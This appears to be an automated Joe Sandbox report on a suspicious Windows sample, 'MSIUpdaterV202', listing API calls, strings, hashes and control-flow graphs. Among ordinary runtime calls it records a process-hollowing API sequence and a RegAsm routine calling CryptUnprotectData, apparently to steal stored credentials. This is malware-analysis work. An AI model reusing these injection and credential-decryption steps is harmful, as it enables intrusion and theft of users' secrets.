                                  • Instruction Fuzzy Hash: 8A01F53221C62D6EA62416FA7C8977E2AD4EF013B473002EAF724871E0EF924C199141
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,34A80F21,?,?,00000000,00C0B0F9,000000FF,?,00BFC0CF,?,?,00BFC0A3,00000000), ref: 00BFC174
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BFC186
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00C0B0F9,000000FF,?,00BFC0CF,?,?,00BFC0A3,00000000), ref: 00BFC1A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 109de34f6994d419978a503348e5beb6f14ff28fb26cc76f371f99b1827eb021
                                  • Instruction ID: f74525d1b423761aa6c52582720b2f5372db87a5c2e0a084ee275ed0f3c7d72c
                                  • Opcode Fuzzy Hash: 109de34f6994d419978a503348e5beb6f14ff28fb26cc76f371f99b1827eb021
                                  • Instruction Fuzzy Hash: D901A27194466DAFDB119F94CC05BBEBBB8FB04B14F01012AF916A26E0DB759940CA90
                                  APIs
                                  • __alloca_probe_16.LIBCMT ref: 00C02A68
                                  • __alloca_probe_16.LIBCMT ref: 00C02B29
                                  • __freea.LIBCMT ref: 00C02B90
                                    • Part of subcall function 00C01DC1: HeapAlloc.KERNEL32(00000000,00BF1FA6,?,?,00BF57EA,?,?,?,00000000,?,00BF17E2,00BF1FA6,?,?,?,?), ref: 00C01DF3
                                  • __freea.LIBCMT ref: 00C02BA5
                                  • __freea.LIBCMT ref: 00C02BB5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                  • String ID:
                                  • API String ID: 1096550386-0
                                  • Opcode ID: 4cae927cb3748f8cf337ba360d07db4622a6b5bd108b3b0796524cdfd4e8a18d
                                  • Instruction ID: a19dc8d0c9747416ff0adea9b97deeae143dca443de3da1efbe00da1d65980d2
                                  • Opcode Fuzzy Hash: 4cae927cb3748f8cf337ba360d07db4622a6b5bd108b3b0796524cdfd4e8a18d
                                  • Instruction Fuzzy Hash: 1351D37260021AAFEF259F65CC89EBB7BA9EF44710B150168FD15E7280EB71CE50D760
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00BF3BD6
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BF3BE1
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00BF3C4F
                                    • Part of subcall function 00BF3D32: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00BF3D4A
                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00BF3BFC
                                  • _Yarn.LIBCPMT ref: 00BF3C12
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                  • String ID:
                                  • API String ID: 1088826258-0
                                  • Opcode ID: 7ce18b14ac24efb152850de30c6e719fe955cdcbfc9babad415957fda079f31e
                                  • Instruction ID: 62d900e0e6d1472ac4aaf202998ab925ba7a93e7ee4ef2b92586a07ab3088166
                                  • Opcode Fuzzy Hash: 7ce18b14ac24efb152850de30c6e719fe955cdcbfc9babad415957fda079f31e
                                  • Instruction Fuzzy Hash: CD01BC75A002599BCB06EB60C85563C7BF1FF84B00B140089EA0257392CFB4AF0ACB89
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00BF2398
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00BF23A5
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BF23E2
                                    • Part of subcall function 00BF3CCD: _Yarn.LIBCPMT ref: 00BF3CEC
                                    • Part of subcall function 00BF3CCD: _Yarn.LIBCPMT ref: 00BF3D10
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                  • String ID: bad locale name
                                  • API String ID: 482894088-1405518554
                                  • Opcode ID: 8316c588f466da2350a7eabc363b23caaed2945f9517328451b9938db5a8e83e
                                  • Instruction ID: 8d50dbec47f8e21eb2d365f2cedf5ef801707da0c508d35e5e19fc58cd48b8f3
                                  • Opcode Fuzzy Hash: 8316c588f466da2350a7eabc363b23caaed2945f9517328451b9938db5a8e83e
                                  • Instruction Fuzzy Hash: EA01C4B1500748DEC7209F6A844045BFEE0FF28350750896FE28DC7B01C7709608CBA9
                                  APIs
                                  • LoadLibraryExW.KERNEL32(00C14FF0,00000000,00000800,?,00BF8973,00000000,?,00000000,?,?,?,00BF8A9D,00000002,FlsGetValue,00C0EC68,FlsGetValue), ref: 00BF89CF
                                  • GetLastError.KERNEL32(?,00BF8973,00000000,?,00000000,?,?,?,00BF8A9D,00000002,FlsGetValue,00C0EC68,FlsGetValue,00000000,?,00BF792D), ref: 00BF89D9
                                  • LoadLibraryExW.KERNEL32(00C14FF0,00000000,00000000,?,00C14FF0,?,?,?,00BF16D9,?,00BF16D9,?), ref: 00BF8A01
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$ErrorLast
                                  • String ID: api-ms-
                                  • API String ID: 3177248105-2084034818
                                  • Opcode ID: edb2ba3daa4650bec04dce1d6192a28b28a3cd6948e9c3185bd28916177bc0a1
                                  • Instruction ID: 52d3b3a948daf9f168ecc47dfbe3928b13fc3bdfc3851e7bb79fd76bc808e8a1
                                  • Opcode Fuzzy Hash: edb2ba3daa4650bec04dce1d6192a28b28a3cd6948e9c3185bd28916177bc0a1
                                  • Instruction Fuzzy Hash: 52E04F3028020CBBEF202BA4ED0AB2C3E99EF10B54F1540B1FB0DE90E0EBA2D855D584
                                  APIs
                                  • GetConsoleOutputCP.KERNEL32(34A80F21,00000000,00000000,00000000), ref: 00BFFBF1
                                    • Part of subcall function 00C03BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C02B86,?,00000000,-00000008), ref: 00C03CA0
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BFFE4C
                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00BFFE94
                                  • GetLastError.KERNEL32 ref: 00BFFF37
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 2112829910-0
                                  • Opcode ID: 718d93a8f50360c85b1d9a04aaa4af92427cbb39e6561f1bf1eb263c015e411e
                                  • Instruction ID: c4af486d52635e8222d9728f7e93ba9f0cb80523ecee0dfeb2b59166e8265bd0
                                  • Opcode Fuzzy Hash: 718d93a8f50360c85b1d9a04aaa4af92427cbb39e6561f1bf1eb263c015e411e
                                  • Instruction Fuzzy Hash: 1AD16675D002599FCB15CFA8D880AFDBBF5FF09314F1841AAEA15EB292D730A846CB50
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 530de8a09d689088f7a82aeaefbbe35164b6186d47422c389e04bf8b02363e8f
                                  • Instruction ID: 85a45e80e542c7f8e61e4ae8241944524351066997dfe4c82abaa18dbeb77227
                                  • Opcode Fuzzy Hash: 530de8a09d689088f7a82aeaefbbe35164b6186d47422c389e04bf8b02363e8f
                                  • Instruction Fuzzy Hash: 8351E17164860AAFDB298F54D845BBEB7E4EF04310F1541EDEB05872A1EB71EE88C790
                                  APIs
                                    • Part of subcall function 00C03BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C02B86,?,00000000,-00000008), ref: 00C03CA0
                                  • GetLastError.KERNEL32 ref: 00C04074
                                  • __dosmaperr.LIBCMT ref: 00C0407B
                                  • GetLastError.KERNEL32(?,?,?,?), ref: 00C040B5
                                  • __dosmaperr.LIBCMT ref: 00C040BC
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 1913693674-0
                                  • Opcode ID: e42accb0031095df09d34209283674debbb93858131a9a05175165d3c034abec
                                  • Instruction ID: fc63b24ed213d45494490e8a619b3d19af8a65b5322cca766de906a44cd74780
                                  • Opcode Fuzzy Hash: e42accb0031095df09d34209283674debbb93858131a9a05175165d3c034abec
                                  • Instruction Fuzzy Hash: 8221B6B1600209AFDB24AF75C881D2BB7ADEF043687108559FB39E7691DB31ED54CB50
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35a9627a7725e5907d6ffb719b1da7f8af917553cd2c08966afb4d262b0d1dbe
                                  • Instruction ID: 0a684be04b1d9ef9e35cfa7b79509a0b1ebc1a25f16f538d6476c58a51a5d64e
                                  • Opcode Fuzzy Hash: 35a9627a7725e5907d6ffb719b1da7f8af917553cd2c08966afb4d262b0d1dbe
                                  • Instruction Fuzzy Hash: D2216D3160020DAFDB20AFA5CD81D7BB7EDEF45364B118598FA25D7652DB30EC4897A0
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 00C04FAE
                                    • Part of subcall function 00C03BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C02B86,?,00000000,-00000008), ref: 00C03CA0
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C04FE6
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C05006
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 158306478-0
                                  • Opcode ID: 4f465fb4d2b9c8818628a76aee2a0347e49b4cf0c5b158edb76671d68a131d0d
                                  • Instruction ID: 8805834f0572256df84f4b809112c8a4e3db2315eb0a7b22b3174ebf4619c9c2
                                  • Opcode Fuzzy Hash: 4f465fb4d2b9c8818628a76aee2a0347e49b4cf0c5b158edb76671d68a131d0d
                                  • Instruction Fuzzy Hash: 7B11D6F550161A7FF72127B65C8AE7F7DACDE997A87100424F603D2181EE24CE00D9B1
                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00C081D1,00000000,00000001,00000000,00000000,?,00BFFF8B,00000000,00000000,00000000), ref: 00C093EC
                                  • GetLastError.KERNEL32(?,00C081D1,00000000,00000001,00000000,00000000,?,00BFFF8B,00000000,00000000,00000000,00000000,00000000,?,00C00512,00000000), ref: 00C093F8
                                    • Part of subcall function 00C093BE: CloseHandle.KERNEL32(FFFFFFFE,00C09408,?,00C081D1,00000000,00000001,00000000,00000000,?,00BFFF8B,00000000,00000000,00000000,00000000,00000000), ref: 00C093CE
                                  • ___initconout.LIBCMT ref: 00C09408
                                    • Part of subcall function 00C09380: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C093AF,00C081BE,00000000,?,00BFFF8B,00000000,00000000,00000000,00000000), ref: 00C09393
                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00C081D1,00000000,00000001,00000000,00000000,?,00BFFF8B,00000000,00000000,00000000,00000000), ref: 00C0941D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: a4cd186a2ab14de4523ff36e226a0e81024af8c46ee534bc63d006f5a0ff177c
                                  • Instruction ID: 78d295bb3d2c6df1cab3be5a9d31273137ed86bf4a4e80dc80dab95f37f7d9e9
                                  • Opcode Fuzzy Hash: a4cd186a2ab14de4523ff36e226a0e81024af8c46ee534bc63d006f5a0ff177c
                                  • Instruction Fuzzy Hash: 6CF0F836401154BBCF221FE5AC08B8E3E26FB483A0F014010FA19851B1CA72C961EB91
                                  APIs
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00BF76BF
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00BF7773
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 3480331319-1018135373
                                  • Opcode ID: c75bb833ed7d6fed771a5e21cbe51bfafb22e14692446426e31e62d2e0301313
                                  • Instruction ID: 54d50a894be441554b506439300ea49ee2c06145731bcf84987d1665a8ca1995
                                  • Opcode Fuzzy Hash: c75bb833ed7d6fed771a5e21cbe51bfafb22e14692446426e31e62d2e0301313
                                  • Instruction Fuzzy Hash: 5641C93491421DAFCF10EF69C884AAEBBF5EF45314F1480D5EA149B392DB319D09CB91
                                  APIs
                                  • EncodePointer.KERNEL32(00000000,?), ref: 00BF7FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                  • Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
                                  • Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID: MOC$RCC
                                  • API String ID: 2118026453-2084237596
                                  • Opcode ID: 82d86ed04e38d40be5fe7cd77ef9ce9c300dacc8b8f0f9107e47ae48184a628b
                                  • Instruction ID: 2322b9140ddca21a3d91aa889f3f8e914d971a207e2aa1e86aba138c5f82f381
                                  • Opcode Fuzzy Hash: 82d86ed04e38d40be5fe7cd77ef9ce9c300dacc8b8f0f9107e47ae48184a628b
                                  • Instruction Fuzzy Hash: 1741257290020DAFCF15DFA4CC81AEEBBB5EF48300F598199FA04A7261DB359958DB91

                                  Execution Graph

                                  Execution Coverage:97.6%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:6
                                  Total number of Limit Nodes:0

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_0109018D

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 010902FC
                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0109030F
                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0109032D
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01090351
                                  • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0109037C
                                  • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 010903D4
                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0109041F
                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0109045D
                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 01090499
                                  • ResumeThread.KERNELBASE(?), ref: 010904A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2189339195.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_1090000_MSIUpdaterV202.jbxd
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                  • String ID: GetP$Load$aryA$ress
                                  • API String ID: 2687962208-977067982
                                  • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                  • Instruction ID: 70d9d6df955bc4d8352ec9fa396d85fe843949d20cbd7a7f6cff6c95b36912fa
                                  • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                  • Instruction Fuzzy Hash: 20B1F57264024AAFDB60CF68CC80BDA77A9FF88714F158164EA48AB345D770FA418B94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: GDEJ
                                  • API String ID: 0-1259571530
                                  • Opcode ID: f6b05b0f5b3b18c2a37678809432361cdf9cfd7bf639f1ae4580f218d8804aa7
                                  • Instruction ID: 9d8f483259980fc78f499511578bc334323c2c61b69059364b182f223e60d921
                                  • Opcode Fuzzy Hash: f6b05b0f5b3b18c2a37678809432361cdf9cfd7bf639f1ae4580f218d8804aa7
                                  • Instruction Fuzzy Hash: F8C21230604B91CFD325CF28D490762BBE2BF96304F59869EC8DA4B796D738E845CB58

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 407 414f19-414f5f call 402090 410 414f61-414f6f 407->410 411 414fb2-414fca call 402110 407->411 413 414f70-414fb0 410->413 415 414fd0-414fdd 411->415 413->411 413->413 415->415 416 414fdf-414fea 415->416 417 414ff1-414ff5 416->417 418 414fec-414fef 416->418 419 414ff8-415008 417->419 418->417 418->419 420 41500a-41500d 419->420 421 41500f 419->421 420->421 422 415010-415029 call 408480 420->422 421->422 425 415138-4151af call 438440 CryptUnprotectData 422->425 426 41502f-41503a 422->426 427 415052-41509b call 40f3e0 * 2 426->427 434 415040 427->434 435 41509d-4150b6 call 40f3e0 427->435 437 415042-41504c 434->437 435->437 439 4150b8-4150ef 435->439 437->425 437->427 440 4150f1-41510e call 40f3e0 439->440 441 41512f-415133 439->441 440->437 444 415114-41512a 440->444 441->437 444->437
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: f
                                  • API String ID: 0-1353099487
                                  • Opcode ID: 96a827d44d822599d3c057fb1bd8ec557fd5e1409a05e87b463a1f1868a95d76
                                  • Instruction ID: 3db40af52cd5cfba5917e550a6c7b2232b3df47b433275b69b226348da4229ed
                                  • Opcode Fuzzy Hash: 96a827d44d822599d3c057fb1bd8ec557fd5e1409a05e87b463a1f1868a95d76
                                  • Instruction Fuzzy Hash: 4871F1B550C3818FC314CF28C4916AEBBE2AFD5304F188A2EE4D687392D738D985CB46
                                  APIs
                                  • LdrInitializeThunk.NTDLL(0043910C,?,00000006,00120089,?,00000018,?,?,0041468B), ref: 00436366
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                  • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                  • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                  • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 73 4149b0-4149c7 74 4149d0-4149d9 73->74 74->74 75 4149db-414a6c RtlExpandEnvironmentStrings call 408480 RtlExpandEnvironmentStrings 74->75 78 414ac5-414b10 call 408480 75->78 79 414a6e 75->79 83 414b31-414b41 78->83 84 414b12-414b1b 78->84 80 414a70-414ac3 79->80 80->78 80->80 86 414b61-414b73 call 438f70 83->86 87 414b43-414b4a 83->87 85 414b20-414b2f 84->85 85->83 85->85 90 414b78-414b94 86->90 89 414b50-414b5f 87->89 89->86 89->89
                                  APIs
                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004149EA
                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                  Similarity
                                  • API ID: EnvironmentExpandStrings
                                  • String ID: }|s
                                  • API String ID: 237503144-1039199241
                                  • Opcode ID: a423aaed873f755818b785dd9ceb33cadae5c486f88a487e6a397ba98f2ae9bb
